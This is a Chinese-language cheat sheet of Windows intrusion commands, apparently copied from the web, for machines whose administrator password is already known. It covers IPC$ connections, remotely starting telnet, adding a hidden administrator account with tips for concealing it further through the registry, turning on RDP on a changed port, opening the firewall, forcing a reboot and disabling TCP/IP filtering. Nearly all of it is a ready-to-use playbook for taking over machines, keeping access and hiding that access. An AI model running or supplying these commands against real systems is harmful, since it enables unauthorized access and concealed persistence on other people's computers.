滲透經常使用命令

IPC$入侵經常使用命令

固然假設管理員帳戶名密碼已經獲得了
net use \\ip\ipc$ "密碼" /user:"用戶名"　　——密碼和用戶名若是沒有空格也能夠不加引號，另外\ipc$也能夠不寫，以下所示：
net use \\ip 密碼 /user:用戶名
sc \\ip config tlntsvr start= auto　　——注意start=後面有個空格
sc \\ip start tlntsvr
telnet ip
input username passwd，thus get remote pc's shell
固然也能夠用net time \\ip 配合at指令定時開啓telnet或是別的服務

能夠添加用戶名密碼並加爲管理員
net user chy$ chy /add
net localgroup administrators chy$ /add　　——用戶名最後加$是能夠防止對方在cmd窗口下輸入net user顯示本身添加的用戶名，固然在計算機管理下的用戶仍是能夠顯示出來的，更深層次的建立隱藏的具備管理員權限的用戶須要直接對註冊表操做，大體思路就是新建一個帳號，而後複製管理員的註冊表信息到新建帳號，註冊表導出，刪除新建帳號，再導入，這樣不只net user看不到，計算機管理也看不到，必定要在註冊表中才會看到，具體操做再也不細說~

關於3389終端經常使用命令，整理以下（摘自網上）：
【注：如下命令所有爲CMD命令，可在 Telnet環境下執行】
1.查詢終端端口 (適用於XP專業版、2000服務器版與2003操做系統)：
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
或如下命令：
regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg
2.開啓XP&2003終端服務
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
3.更改終端端口爲20008 (0x4E28)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
4.取消xp&2003系統防 火牆對終端服務3389端口的限制及IP鏈接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
5.開啓Win2000的終端，端口爲3389(需重啓)
echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
6.強行重啓 Win2000&Win2003系統(執行完最後一條一句後自動重啓)
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf
7.禁用TCP/IP端口篩選 (需重啓)
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
8.終端超出最大鏈接數時可用下面的命 令來鏈接
mstsc /v:ip:3389 /console